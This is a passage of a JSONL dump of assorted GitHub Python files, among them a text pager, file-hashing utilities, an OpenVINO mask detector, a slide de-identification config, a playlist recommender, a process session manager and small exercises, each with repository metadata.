msvcrt.putch(ch.encode())\n key = msvcrt.getche()\n msvcrt.putch(b'\\n')\n return key\n else:\n assert False, 'platform not supported'\n\ndef more(text, numlines=15):\n \"\"\"\n splits a string of text (by \\n) and\n interactively pages it with user input \n \"\"\"\n lines = text.splitlines()\n while lines:\n chunk = lines[:numlines]\n lines = lines[numlines:]\n for line in chunk:\n print(line)\n if lines and getreply() not in [b'', b'y', b'Y', b'\\r']:\n break\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n more(sys.stdin.read(), 10)\n else:\n more(open(sys.argv[1]).read(), 10)\n","repo_name":"jeyeong/Misc.-Python-Tools","sub_path":"1. 
String Pager (sys)/more.py","file_name":"more.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36385277350","text":"import os\nimport hashlib\nimport re\nfrom batchq.core.errors import HashException\nimport zipfile\nimport copy\n\ncmdhasher = "md5"\nhasher_routine = "md5"\n\ndef zipper(filename, relative_path, pwd = None):\n    orgp = os.getcwd()\n    if pwd is not None: os.chdir(pwd)\n    zfile = zipfile.ZipFile(filename, 'w')\n\n    def add(p): \n        if os.path.isfile(p):\n            zfile.write(p)\n            return \n\n        for file in os.listdir(p):\n            add( os.path.join(p, file) )\n\n    add(relative_path)\n    zfile.close()\n    os.chdir(orgp)\n\n\n\ndef which (filename, lookin = [], env = None):\n    if os.path.dirname(filename) != '':\n        if os.access (filename, os.X_OK):\n            return filename\n\n    if env is None:\n        env = os.environ\n\n    lookin = lookin + env['PATH'].split(os.pathsep) if 'PATH' in env else lookin\n    lookin.append(os.defpath)\n\n    for path in lookin:\n        f = os.path.join(path, filename)\n        if os.access(f, os.X_OK):\n            return f\n    return None\n\n\ndef environment (**kwargs):\n    nenv = copy.deepcopy(os.environ)\n    nenv.update(kwargs)\n    return nenv\n\n\n\ndef filelist(path, list = None): \n    \"\"\"\n    Computes a file list of the given path.\n    \"\"\"\n    if list is None:\n        list = []\n    for filename in sorted(os.listdir(path)): \n        newpath = os.path.join(path, filename) \n\n        if os.path.isfile(newpath):\n            list +=[newpath]\n        else:\n            list = filelist(newpath, list) \n    return list\n\ndef hash_filelist(list):\n    \"\"\"\n    Computes the hash of a filelist. \n    \"\"\"\n    global hasher_routine\n    haobj = hashlib.new(hasher_routine)\n    for filename in list:\n        if os.path.isfile(filename):\n            f = open(filename, 'rb') \n            haobj.update(f.read())\n            f.close()\n    hex = haobj.hexdigest()\n\n    return hex\n\ndef directory_hash(dir):\n    \"\"\"\n    Computes the hash of a directory. \n    \"\"\"\n    if not os.path.isdir(dir):\n        raise HashException("'%s' is not a directory." % dir)\n\n    return hash_filelist(sorted(filelist(dir)))\n\ndef file_hash(file):\n    \"\"\"\n    Computes the hash of a file. 
\n \"\"\"\n if not os.path.isfile(file):\n raise HashException(\"'%s' is not a file.\" % file)\n return hash_filelist([file])\n\ndef hash(path):\n if os.path.isfile(path):\n return file_hash(path)\n if os.path.isdir(path):\n return directory_hash(path)\n\n raise HashException(\"File or directory does not exist.\")\n\ndef bash_hash_directory(dir):\n \"\"\"\n Gives the equivalent bash command to directory_hash(dir).\n \"\"\"\n print(\"DEPRECATED !!!!!!\")\n global cmdhasher\n# return \"find '%s' -type f -print0 | sort -z\" % (dir)\n return \"find '%s' -type f -print0 | sort -z | xargs -0 cat | %s\" % (dir, cmdhasher)\n\ndef bash_hash_file(file):\n \"\"\"\n Gives the equivalent bash command to file_hash(dir).\n \"\"\"\n print(\"DEPRECATED !!!!!!\")\n global cmdhasher\n return \"%s '%s'\" % (cmdhasher, file)\n\ndef bash_hash_pattern():\n print(\"DEPRECATED !!!!!!\")\n return r\"(?P[a-fA-F\\d]{32})\"\n\ndef bash_extract_hash(response):\n print(\"DEPRECATED !!!!!!\")\n# return response\n searcher_for = re.compile(bash_hash_pattern())\n match = searcher_for.search(response)\n if not match:\n raise HashException(\"The output '%s' did not contain a hash string of the expected format.\"%response)\n\n return match.group(\"hash\")\n\n","repo_name":"troelsfr/BatchQ","sub_path":"batchq/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11236015492","text":"import cv2\nimport numpy as np\n\nfrom pyvino_utils.models.openvino_base.base_model import Base\n\n__all__ = [\n \"FaceDetection\",\n \"MaskDetection\",\n]\n\n\nCOLOR = {\"Green\": (0, 255, 0), \"Red\": (0, 0, 255)}\n\n\nclass FaceDetection(Base):\n \"\"\"Class for the Face Detection Model.\"\"\"\n\n def __init__(\n self,\n model_name,\n source_width=None,\n source_height=None,\n device=\"CPU\",\n threshold=0.60,\n extensions=None,\n **kwargs,\n ):\n super().__init__(\n model_name,\n source_width,\n source_height,\n device,\n threshold,\n extensions,\n **kwargs,\n )\n\n def preprocess_output(self, inference_results, image, show_bbox=False, **kwargs):\n \"\"\"Draw bounding boxes onto the Face Detection frame.\"\"\"\n results = {}\n if not (self._init_image_w and self._init_image_h):\n raise RuntimeError(\"Initial image width and height cannot be None.\")\n if len(inference_results) == 1:\n inference_results = inference_results[0]\n\n bbox_coord = []\n for box in inference_results[0][0]: # Output shape is 1x1xNx7\n conf = box[2]\n if conf >= self.threshold:\n xmin = int(box[3] * self._init_image_w)\n ymin = int(box[4] * self._init_image_h)\n xmax = int(box[5] * self._init_image_w)\n ymax = int(box[6] * self._init_image_h)\n bbox_coord.append((xmin, ymin, xmax, ymax))\n if show_bbox:\n self.draw_output(image, xmin, ymin, xmax, ymax, **kwargs)\n\n results[\"image\"] = image\n results[\"bbox_coord\"] = bbox_coord\n return results\n\n @staticmethod\n def draw_output(\n image,\n xmin,\n ymin,\n xmax,\n ymax,\n label=\"Person\",\n padding_size=(0.05, 0.25),\n scale=2,\n thickness=2,\n **kwargs,\n ):\n _label = None\n if kwargs.get(\"mask_detected\"):\n _label = (\n (f\"{label} Wearing Mask\", COLOR[\"Green\"])\n if float(kwargs.get(\"mask_detected\")) > kwargs.get(\"threshold\", 0.1)\n else (f\"{label} NOT wearing a Mask!!!\", COLOR[\"Red\"])\n )\n # print(_label)\n\n label = _label if _label is not None else (label, COLOR[\"Green\"])\n\n cv2.rectangle(\n image, (xmin, ymin), (xmax, ymax,), color=label[1], 
thickness=thickness,\n )\n ((label_width, label_height), _) = cv2.getTextSize(\n label[0], cv2.FONT_HERSHEY_PLAIN, fontScale=scale, thickness=thickness,\n )\n\n cv2.putText(\n image,\n label[0],\n org=(image.shape[0] // 3, image.shape[1] // 3),\n fontFace=cv2.FONT_HERSHEY_PLAIN,\n fontScale=scale,\n color=label[1],\n thickness=thickness,\n )\n\n\nclass MaskDetection(Base):\n \"\"\"Class for the Mask Detection Model.\"\"\"\n\n def __init__(\n self,\n model_name,\n source_width=None,\n source_height=None,\n device=\"CPU\",\n threshold=0.60,\n extensions=None,\n **kwargs,\n ):\n super().__init__(\n model_name,\n source_width,\n source_height,\n device,\n threshold,\n extensions,\n **kwargs,\n )\n\n def preprocess_output(self, inference_results, image, show_bbox=False, **kwargs):\n results = {}\n results[\"flattened_predictions\"] = np.vstack(inference_results).ravel()\n results[\"image\"] = image\n return results\n\n def draw_output(\n self, image, inference_results, **kwargs,\n ):\n pass\n","repo_name":"mmphego/face_mask_detection_openvino","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"48"} +{"seq_id":"7647316079","text":"import girder.utility.config\n\nCONFIG_SECTION = 'wsi_deid'\nNUMERIC_VALUES = (\n r'^\\s*[+-]?(\\d+([.]\\d*)?([eE][+-]?\\d+)?|[.]\\d+([eE][+-]?\\d+)?)(\\s*,\\s*[+-]?'\n r'(\\d+([.]\\d*)?([eE][+-]?\\d+)?|[.]\\d+([eE][+-]?\\d+)?))*\\s*$'\n)\n\ndefaultConfig = {\n 'redact_macro_square': False,\n 'always_redact_label': False,\n 'require_redact_category': True,\n 'require_reject_reason': False,\n 'edit_metadata': False,\n 'add_title_to_label': True,\n 'show_import_button': True,\n 'show_export_button': True,\n 'show_next_item': True,\n 'show_metadata_in_lists': True,\n 'show_next_folder': True,\n 'no_redact_control_keys': {\n r'^internal;aperio_version$': '',\n r'^internal;openslide;openslide\\.(?!comment$)': '',\n r'^internal;openslide;tiff\\.(XResolution|YResolution)$': NUMERIC_VALUES,\n r'^internal;openslide;tiff\\.ResolutionUnit$': '',\n },\n 'no_redact_control_keys_format_aperio': {\n r'^internal;openslide;aperio\\.(AppMag|MPP|Exposure (Time|Scale))$': NUMERIC_VALUES,\n },\n 'no_redact_control_keys_format_hamamatsu': {\n r'^internal;openslide;hamamatsu\\.SourceLens$': NUMERIC_VALUES,\n },\n 'no_redact_control_keys_format_philips': {},\n 'no_redact_control_keys_format_isyntax': {},\n 'hide_metadata_keys': {\n r'^internal;openslide;openslide\\.level\\[': NUMERIC_VALUES,\n },\n 'hide_metadata_keys_format_aperio': {\n r'^internal;openslide;(openslide\\.comment|tiff\\.ImageDescription)$': '',\n (\n r'^internal;openslide;aperio\\.(Original(Height|Width)|Left|Top|Right|Bottom'\n r'|LineArea(X|Y)Offset|LineCameraSkew|Focus Offset|StripeWidth|DisplayColor)'\n ): NUMERIC_VALUES,\n },\n 'hide_metadata_keys_format_hamamatsu': {\n (\n r'^internal;openslide;hamamatsu\\.((AHEX|MHLN|YRNP|zCoarse|zFine)\\['\n r'|(X|Y)OffsetFromSlideCentre|ccd.(width|height)|(focalplane|slant)\\.(left|right)'\n r'(top|bottom)|stage.center)'\n ): NUMERIC_VALUES,\n },\n 'hide_metadata_keys_format_philips': {},\n 'hide_metadata_keys_format_isyntax': {\n r'^internal;(xml;|wsi;|xml$|wsi$)': '',\n r'^internal;isyntax;(is_UFS|is_UFSb|is_UVS|is_philips|isyntax_file_version)$': '',\n r'^internal;isyntax;(num_images|scanner_rack_priority)$': NUMERIC_VALUES,\n },\n 'upload_metadata_for_export_report': [\n 'ImageID', 'Proc_Seq', 'Proc_Type', 'Slide_ID', 'Spec_Site', 'TokenID',\n 
],\n    'import_text_association_columns': [],\n    'folder_name_field': 'TokenID',\n    'image_name_field': 'ImageID',\n    'validate_image_id_field': True,\n    'reject_reasons': [{\n        'category': 'Cannot_Redact',\n        'text': 'Cannot redact PHI',\n        'key': 'Cannot_Redact'\n    }, {\n        'category': 'Slide_Quality',\n        'text': 'Slide Quality',\n        'types': [\n            {'key': 'Chatter_Tears', 'text': 'Chatter/tears in tissue'},\n            {'key': 'Folded_Tissue', 'text': 'Folded tissue'},\n            {'key': 'Overstaining', 'text': 'Overstaining'},\n            {'key': 'Cover_Slip', 'text': 'Cover slip issues'},\n            {'key': 'Debris', 'text': 'Debris or dust'},\n            {'key': 'Air_Bubbles', 'text': 'Air bubbles'},\n            {'key': 'Pathologist_Markings', 'text': \"Pathologist's Markings\"},\n            {'key': 'Other_Slide_Quality', 'text': 'Other'}\n        ]\n    }, {\n        'category': 'Image_Quality',\n        'text': 'Image Quality',\n        'types': [\n            {'key': 'Out_Of_Focus', 'text': 'Out of focus'},\n            {'key': 'Low_Resolution', 'text': 'Low resolution'},\n            {'key': 'Other_Image_Quality', 'text': 'Other'}\n        ]\n    }],\n    'phi_pii_types': [\n        {\n            'category': 'Personal_Info',\n            'text': 'Personal Information',\n            'types': [\n                {'key': 'Patient_Name', 'text': 'Patient Name'},\n                {'key': 'Patient_DOB', 'text': 'Date of Birth '},\n                {'key': 'SSN', 'text': 'Social Security Number'},\n                {'key': 'Other_Personal', 'text': 'Other Personal'}\n            ]\n        },\n        {\n            'category': 'Demographics',\n            'key': 'Demographics',\n            'text': 'Demographics'\n        },\n        {\n            'category': 'Facility_Physician',\n            'key': 'Facility_Physician',\n            'text': 'Facility/Physician Information'\n        },\n        {\n            'category': 'Other_PHIPII',\n            'key': 'Other_PHIPII',\n            'text': 'Other PHI/PII'\n        }\n    ]\n}\n\n\ndef getConfig(key=None, fallback=None):\n    configDict = girder.utility.config.getConfig().get(CONFIG_SECTION) or {}\n    if key is None:\n        config = defaultConfig.copy()\n        config.update(configDict)\n        return config\n    if key in configDict:\n        return configDict[key]\n    if key in defaultConfig:\n        return defaultConfig[key]\n    return fallback\n","repo_name":"DigitalSlideArchive/DSA-WSI-DeID","sub_path":"wsi_deid/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"22956342741","text":" \n \n# Number card game\n# Laid out as n rows by n columns\n# 1. Extract the minimum value from each row\n# 2. Print the maximum among the extracted minimums\n \n\n# Read the row and column counts\nn, m = map(int, input().split())\n\nresult = 0\n\nfor i in range(n):\n    data = list(map(int, input().split()))\n    \n    # find the minimum with the min() function\n    # initialise min_value just above the maximum allowed value\n    min_value = 10001\n\n    # store the minimum via the loop and the min() function\n    for a in data:\n        min_value = min(min_value, a)\n\n    # the result is the maximum of the minimums\n    result = max(result, min_value)\n    \n# print the result\nprint(result)\n","repo_name":"laphayen/coding_test_python","sub_path":"etc/number card game loop.py","file_name":"number card game loop.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7354531183","text":"# Author: 宁方笑\n# Created: 2021/8/7 21:19\nclass ListNode:\n    def __init__(self,val,next):\n        self.val=val\n        self.next=next\n\ndef swapPairs(head): # recursive\n    if not head or not head.next:\n        return head\n    newHead = head.next\n    head.next = swapPairs(newHead.next)\n    newHead.next = head\n    return newHead","repo_name":"opensourcex123/LeetCode","sub_path":"demo134 两两交换链表中的结点.py","file_name":"demo134 两两交换链表中的结点.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14079052216","text":"import os\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport sklearn\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport json\nfrom tqdm import tqdm\ntqdm.pandas()\n\ndef remove_seen(seen, l):\n    seen = set(seen)\n    return [x for x in l if not (x in seen)]\n\ndef rec_each_song(playlst_id, song_id, songs_len):\n    # globals: sim_df, train, val, best300, train_songs\n    seen_song = val[val['id'] == playlst_id]['songs'].values[0]\n    # case: songs_len is not 0\n    if songs_len != 0: \n        n = 100//songs_len + 20 # 23 \n        rec_lst = []\n        # case: song_id is in sim_df\n        if song_id in sim_df.columns:\n            series = sim_df[song_id].sort_values(ascending=False)\n            series = series.drop(song_id)\n            rec_lst = series.head(n).to_frame().index.tolist()\n            return remove_seen(seen_song, rec_lst) \n        # case: song_id is not in sim_df\n        else:\n            if song_id in train_songs.values.tolist(): # song_id is in train\n                playlst_ids = train_songs[train_songs==song_id].index.tolist()\n                dict_like = {}\n                for i in playlst_ids:\n                    dict_like[train.loc[i]['id']] = train.loc[i]['like_cnt']\n                rec_lst = train[train['id'] == sorted(dict_like.items(), key=lambda x: x[1], reverse=True)[0][0]]['songs'].values[0] \n                if len(rec_lst) >= n: \n                    rec_list = rec_lst[:n] # rec_list : the first n items of rec_lst\n                    return remove_seen(seen_song, rec_list) \n                else:\n                    lst = remove_seen(rec_lst, best300) # best300 with rec_lst removed\n                    rec_lst += lst[:n-len(rec_lst)] # rec_lst plus n-len(rec_lst) items taken from lst (n in total)\n                    return remove_seen(seen_song, rec_lst) # rec_lst with seen_song removed\n            else: # song_id is not in train\n                rec_lst = best300\n                return remove_seen(seen_song, rec_lst)[:100]\n    # case: songs_len is 0\n    else: \n        rec_lst = best300\n        return remove_seen(seen_song, rec_lst)[:100]\n\ndef rec_100(df):\n    rec_100 = []\n    no_sim = []\n    df = df.reset_index(drop=True)\n    for i in range(len(df)):\n        if df['songs'][i] in sim_df.columns:\n            rec_100 += df['rec_list'][i]\n        else:\n            no_sim += df['rec_list'][i]\n    return rec_100 + list(set(no_sim))[:100-len(rec_100)]\n\ndef _conv(o):\n    if isinstance(o, (np.int64, np.int32)):\n        return int(o)\n    raise TypeError\n\n###### main ######\n\npath = '/home/nsun/mountainGo/'\n\n# load the dataframe\nsong_mel = pd.read_csv(path+'song_mel.csv')\nsong_mel.head()\n\nlabels = song_mel[['song_id']]\ndf= 
song_mel.drop(columns=['song_id'])\n\n# compute the similarity\nsimilarity = cosine_similarity(df) \nsim_df = pd.DataFrame(similarity, index=labels.index, columns=labels.index)\n\n# load the data\ntrain = pd.read_json(path+'train.json')\nval = pd.read_json(path+'val.json')\nval['songs_len'] = val['songs'].apply(lambda x: len(x))\n\n# create the globals\ntrain_val = pd.concat([train, val])\nbest300 = train_val.songs.explode().value_counts()[:300].index.tolist()\ntrain_songs = train['songs'].explode()\n\n# generate recommendations for each song in the playlist\ndf_val = val[['id','songs','songs_len']].copy().explode('songs')\ndf_val['rec_list'] = df_val.progress_apply(lambda x: rec_each_song(x['id'], x['songs'], x['songs_len']), axis=1)\n\n# final recommendation of 100 songs\nfinal = df_val.groupby('id').apply(lambda x: rec_100(x))\nlst = []\nfor i in tqdm(range(len(final))):\n    d = {}\n    d['id'] = final.index[i]\n    d['songs'] = final[final.index[i]]\n    lst.append(d)\n\n# save as a json file\nwith open(path+'results.json', 'w', encoding='utf-8') as f:\n    json.dump(lst, f, ensure_ascii=False, default=_conv) # keep Korean characters intact\n\n","repo_name":"kyuwoncho/project","sub_path":"MelonPlaylist-main/Mel-spectrogram/mel_cosine_rec.py","file_name":"mel_cosine_rec.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71996016786","text":"# -*- coding: UTF-8 -*-\r\nimport os\r\nimport shlex\r\nimport shutil\r\nfrom subprocess import Popen\r\nfrom tinyscript.helpers import Path\r\n\r\n__all__ = [\"SessionsManager\"]\r\n\r\n\r\nclass Session(object):\r\n    \"\"\" Class representing a session object based on a shell command \"\"\"\r\n    def __init__(self, n, cmd, **kwargs):\r\n        self.id = n\r\n        self.parent = kwargs.pop('parent')\r\n        if isinstance(cmd, str):\r\n            cmd = shlex.split(cmd)\r\n        self._cmd = cmd  # keep the parsed command for start()\r\n        self._path = Path(self.parent.console._files.tempdir, \"session\", str(n), create=True)\r\n        self._named_pipes = []\r\n        for i, s in enumerate([\"stdin\", \"stdout\", \"stderr\"]):\r\n            fifo = str(self._path.joinpath(str(i)))\r\n            self._named_pipes.append(fifo)\r\n            os.mkfifo(fifo, 0o777)\r\n            setattr(self, \"_\" + s, os.open(fifo, os.O_WRONLY))\r\n    \r\n    def close(self):\r\n        for s in [\"stdin\", \"stdout\", \"stderr\"]:\r\n            os.close(getattr(self, \"_\" + s))  # os.open() returns a raw file descriptor\r\n        shutil.rmtree(str(self._path))\r\n        self._process.wait()\r\n        del self.parent[self.id]\r\n    \r\n    def start(self, **kwargs):\r\n        kwargs['close_fds'] = True\r\n        kwargs['preexec_fn'] = os.setsid # NB: see subprocess' doc ; preexec_fn is not thread-safe\r\n        self._process = Popen(self._cmd, stdout=self._stdout, stderr=self._stderr, stdin=self._stdin, **kwargs) \r\n\r\n\r\nclass SessionsManager(object):\r\n    \"\"\" Class for managing session objects. \"\"\"\r\n    def __init__(self, max_sessions=None):\r\n        self.__sessions = []\r\n        self.max = max_sessions\r\n    \r\n    def __delitem__(self, session_id):\r\n        self.__sessions[session_id] = None\r\n        while self.__sessions and self.__sessions[-1] is None:\r\n            self.__sessions.pop()\r\n    \r\n    def __getitem__(self, session_id):\r\n        return self.__sessions[int(session_id)]\r\n    \r\n    def __iter__(self):\r\n        for i, s in enumerate(self.__sessions):\r\n            if s is not None:\r\n                yield i, s\r\n    \r\n    def __len__(self):\r\n        n = 0\r\n        for s in self:\r\n            n += 1\r\n        return n\r\n    \r\n    def new(self, session):\r\n        for i, s in enumerate(self.__sessions):\r\n            if s is None:\r\n                self.__sessions[i] = session\r\n                return session\r\n        self.__sessions.append(session)\r\n        return session\r\n    \r\n    def process(self, cmd, **kwargs):\r\n        return self.new(Session(len(self.__sessions) + 1, cmd, parent=self, **kwargs))\r\n    \r\n    def shell(self, shell_cls, *args, **kwargs):\r\n        return self.new(shell_cls(*args, **kwargs))\r\n\r\n","repo_name":"dhondta/python-sploitkit","sub_path":"src/sploitkit/core/components/sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"48"} +{"seq_id":"15950918304","text":"#encoding:utf-8\nfrom django.template.context_processors import csrf\nfrom django.shortcuts import get_object_or_404, render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Categoria,Slider\nfrom django.template.context import RequestContext\nfrom django.contrib import auth\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom .models import Usuario\nfrom .forms import sliderForm\n\n@login_required(login_url='/usuarios/login/')\ndef agregar_slider(request):\n    user = request.user\n    usuario = Usuario.objects.get(usuario=user)\n    slider = Slider.objects.all()\n    categoria = Categoria.objects.all()\n    if request.method == 'POST':\n        form_slider = sliderForm(request.POST,request.FILES)\n        if form_slider.is_valid():\n            slider = form_slider.save(commit=False)\n            slider.save()\n            return redirect('menu-sliders')\n    else:\n        form_slider = sliderForm()\n    args = {}\n    args.update(csrf(request))\n    page_title = \"AGREGAR SLIDER\"\n    template =\"agregar_slider.html\" \n    return render(request,template, locals())\n\n@login_required(login_url='/usuarios/login/')\ndef agregar_cat_slider(request):\n    page_title = \"AGREGAR CATEGORIA\"\n    user = request.user\n    template =\"agregar_cat_slider.html\" \n    return render(request,template, locals())\n\n@login_required(login_url='/usuarios/login/')\ndef menu_sliders(request):\n    page_title = \"SLIDERS\"\n    user = request.user\n    slider = Slider.objects.all()\n    template =\"menu_sliders.html\" \n    return render(request,template, locals())\n\n","repo_name":"josefidelmunguia/cms","sub_path":"sliders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14282997405","text":"import random\r\nrock = '''\r\n    _______\r\n---'   ____)\r\n      (_____)\r\n      (_____)\r\n      (____)\r\n---.__(___)\r\n'''\r\n\r\npaper = '''\r\n    _______\r\n---'   ____)____\r\n          ______)\r\n          _______)\r\n         _______)\r\n---.__________)\r\n'''\r\n\r\nscissors = '''\r\n    _______\r\n---'   ____)____\r\n          ______)\r\n       __________)\r\n      (____)\r\n---.__(___)\r\n'''\r\nuser_action = input(\"Enter a choice (rock, paper, scissors): \").lower()\r\npossible_actions = [\"rock\", \"paper\", 
\"scissors\"]\r\ncomputer_action = random.choice(possible_actions)\r\nif(user_action == \"rock\"):\r\n image_u = rock\r\nelif(user_action == \"paper\"):\r\n image_u = paper\r\nelif(user_action == \"scissors\"):\r\n image_u = scissors\r\nif(computer_action == \"rock\"):\r\n image_c = rock\r\nelif(computer_action == \"paper\"):\r\n image_c = paper\r\nelif(computer_action == \"scissors\"):\r\n image_c = scissors\r\nprint(f\"\\nYou chose {user_action} , computer chose {computer_action} .\\n\")\r\nprint(image_u + \" \" + 'vs' + \" \" + image_c)\r\n\r\nif user_action == computer_action:\r\n print(f\"Both players selected {user_action}. It's a tie!\")\r\nelif user_action == \"rock\":\r\n if computer_action == \"scissors\":\r\n print(\"Rock smashes scissors! You win!\")\r\n else:\r\n print(\"Paper covers rock! You lose.\")\r\nelif user_action == \"paper\":\r\n if computer_action == \"rock\":\r\n print(\"Paper covers rock! You win!\")\r\n else:\r\n print(\"Scissors cuts paper! You lose.\")\r\nelif user_action == \"scissors\":\r\n if computer_action == \"paper\":\r\n print(\"Scissors cuts paper! You win!\")\r\n else:\r\n print(\"Rock smashes scissors! You lose.\")\r\n\r\n","repo_name":"callmenani/Python_programming","sub_path":"Randomization and lists/Rock_Paper_Scisscor.py","file_name":"Rock_Paper_Scisscor.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1478201977","text":"from PIL import Image\nimport numpy as np\nimport cv2\nimport math\nimgpil=Image.open(\"obj94__0.png\")\nimgpil2=Image.open(\"obj94__5.png\")\nimgpil3=Image.open(\"obj94__10.png\")\nimgpil.show()\nimgpil2.show()\nimgpil3.show()\nimg0=imgpil.convert('L')\nimg00=imgpil2.convert('L')\nimg000=imgpil3.convert('L')\nimg0.show()\nimg00.show()\nimg000.show()\nimg=np.array(img0)\nimg2=np.array(img00)\nimg3=np.array(img000)\n#pour la 1ère image\nprint(\"pour la 1ére image:\")\nmoments=cv2.moments(img)\nprint(\"les moments :\",moments)\nhuMoments=cv2.HuMoments(moments)\nprint(\"\\n\")\nfor i in range(0,7):\n huMoments[i]=-1*math.copysign(1.0,huMoments[i])*math.log10(abs(huMoments[i]))\nprint(\"les humoments:\",huMoments)\nprint(\"\\n\")\n\n#pour la 2ème image\nprint(\"pour la 2eme image:\")\nmoments=cv2.moments(img2)\nprint(\"les moments :\",moments)\nhuMoments=cv2.HuMoments(moments)\nprint(\"\\n\")\nfor i in range(0,7):\n huMoments[i]=-1*math.copysign(1.0,huMoments[i])*math.log10(abs(huMoments[i]))\nprint(\"les humoments:\",huMoments)\nprint(\"\\n\")\n\n#pour la 3ème image\nprint(\"pour la 3eme image:\")\nmoments=cv2.moments(img3)\nprint(\"les moments :\",moments)\nhuMoments=cv2.HuMoments(moments)\nprint(\"\\n\")\nfor i in range(0,7):\n huMoments[i]=-1*math.copysign(1.0,huMoments[i])*math.log10(abs(huMoments[i]))\nprint(\"les humoments:\",huMoments)\n","repo_name":"projet-d-ete/code2","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9596656862","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, ForeignKey\nfrom sqlalchemy import Integer, String, Binary, Float\n\nBase = declarative_base()\n\nclass Offer(Base):\n __tablename__ = 'requests'\n offerId = Column(Integer, primary_key=True, autoincrement=True)\n requestId = Column(Integer, ForeignKey('requests.requestId'))\n is_pending = Column(Binary)\n is_confirmed = Column(Binary)\n user_email = 
Column(String, ForeignKey('users.email'))\n quantity = Column(Float)\n item = Column(String)\n price = Column(Float)\n willing_to_transport = Column(Binary)\n image = Column(String)\n\n def __init__(self, requestId, user_email, quantity, price, willing_to_transport, image):\n self.offerId = Offer.offerId\n self.requestId = requestId\n self.user_email = user_email\n self.quantity = quantity\n self.is_confirmed = False\n self.is_pending = True\n self.price = price\n self.willing_to_transport = willing_to_transport\n self.image = image\n\n def __str__(self):\n return f'Offer {self.offerId} for request {self.requestId}'\n\n def json(self):\n return {'offerId': self.offerId,\n 'requestId': self.requestId,\n 'user_email': self.user_email,\n 'quantity': self.quantity,\n 'is_confirmed': self.is_confirmed,\n 'is_pending': self.is_pending,\n 'price': self.price,\n 'willing_to_transport': self.willing_to_transport,\n 'image': self.image}","repo_name":"trevor-pope/covid19-supply-network","sub_path":"backend/models/offer.py","file_name":"offer.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4998707194","text":"#!/usr/bin/env python3\n\n############################################################################################\n# #\n# Program purpose: Finds whether a given string starts with a given character using #\n# lambda. #\n# Program Author : Happi Yvan #\n# Creation Date : February 04, 2020 #\n# #\n############################################################################################\n\ndef obtain_user_data(input_mess) -> str:\n user_data, valid = '', False\n while not valid:\n try:\n user_data = input(input_mess)\n if len(user_data) == 0:\n raise ValueError(\"Oops, data needed\")\n valid = True\n except ValueError as ve:\n print(f'[ERROR]: {ve}')\n return user_data\n\nif __name__ == \"__main__\":\n\n lambda_func = lambda data, search: True if data.startswith(search) else False\n\n main_str = obtain_user_data(input_mess='Enter main string: ')\n search_str = obtain_user_data(input_mess='Enter search string: ')\n\n print(f\"Search 'startswith' found: {lambda_func(main_str, search_str)}\")\n","repo_name":"ivenpoker/Python-Projects","sub_path":"Projects/Online Workouts/w3resource/Lambda/program-7.py","file_name":"program-7.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42041817563","text":"def main():\n boxWidth = int(input(\"Please enter the width of the box: \"))\n boxHeight = int(input(\"Please enter the height of the box: \"))\n outlineSymbol = input(\"Please enter a symbol for the box outline: \")\n fillSymbol = input(\"Please enter a symbol for the box fill: \")\n boxCounter = 0\n for i in range(boxCounter, boxHeight):\n if(boxCounter == (boxHeight-1) or boxCounter == 0):\n print(outlineSymbol * boxWidth)\n boxCounter = boxCounter +1\n else:\n print(outlineSymbol + fillSymbol *(boxWidth -2) + outlineSymbol)\n boxCounter = boxCounter +1 \nmain()\n","repo_name":"MAPLE-Robot-Subgoaling/IPT","sub_path":"data/HW5/hw5_176.py","file_name":"hw5_176.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73036050067","text":"import cv2 as cv\nimport numpy as np\n\ndef canny_demo(image):\n blur = cv.GaussianBlur(image, (3, 3), 0)\n gray = cv. 
